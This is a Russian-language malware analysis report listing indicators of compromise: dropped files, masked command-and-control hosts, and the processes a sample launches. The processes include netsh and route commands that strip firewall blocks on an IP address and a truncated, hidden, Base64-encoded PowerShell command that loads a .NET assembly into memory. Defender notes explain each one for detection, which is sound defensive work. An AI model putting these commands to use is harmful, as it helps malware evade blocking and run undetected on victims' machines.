Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\system32.vbs
- %HOMEPATH%\pictures\cc.exe
- %TEMP%\nsne310.tmp
- %TEMP%\nsse330.tmp\nsexec.dll
- %TEMP%\nsse330.tmp\repackme.gif
- %TEMP%\nsse330.tmp\newadvsplash.dll
- %TEMP%\nsse330.tmp\langdll.dll
- %HOMEPATH%\pictures\update.vbs
- 'up####.myiphost.com':1188
- 'on####ve.live.com':443
- 'k7####.#n.files.1drv.com':443
- 'an####ousfiles.io':443
- DNS ASK on####ve.live.com
- DNS ASK k7####.#n.files.1drv.com
- DNS ASK an####ousfiles.io
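- DNS ASK up####.myiphost.com
  Примечание: символы # в именах узлов, по-видимому, скрывают часть имени в самом отчёте (в DNS-имени такой символ недопустим), поэтому эти строки подходят только для сопоставления по видимой части, а не как точные индикаторы.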
- '%HOMEPATH%\pictures\cc.exe'
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Pictures\update.vbs"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="all" remoteip=95.141.193.133 (со скрытым окном)
- '%WINDIR%\syswow64\route.exe' delete 95.141.193.133 (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA... (со скрытым окном)
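- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="all" remoteip=95.141.193.133
- '%WINDIR%\syswow64\route.exe' delete 95.141.193.133
  Примечание: первая команда удаляет правила брандмауэра Windows, в которых удалённым адресом указан 95.141.193.133, вторая — маршрут к этому адресу; вероятно, так снимается ранее установленная блокировка адреса. Запуск netsh.exe и route.exe с такими аргументами стоит искать в журналах создания процессов.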
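- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...
  Примечание: аргумент -en (сокращение от -EncodedCommand) — это команда в кодировке Base64 (UTF-16LE); в отчёте она обрезана («...»). Видимая часть декодируется в `[AppDomain]::('?urrent@omain'.replace('?','C').replace('@','D')).Loa`, то есть это обращение к [AppDomain]::CurrentDomain и, судя по обрезанному имени метода, вызов Load (загрузка .NET-сборки в память). Имя свойства собирается через replace(), поэтому поиск по строке «CurrentDomain» в исходном тексте команды его не найдёт; для обнаружения надёжнее искать запуск powershell.exe с -noexit и -en в скрытом окне и декодировать аргумент.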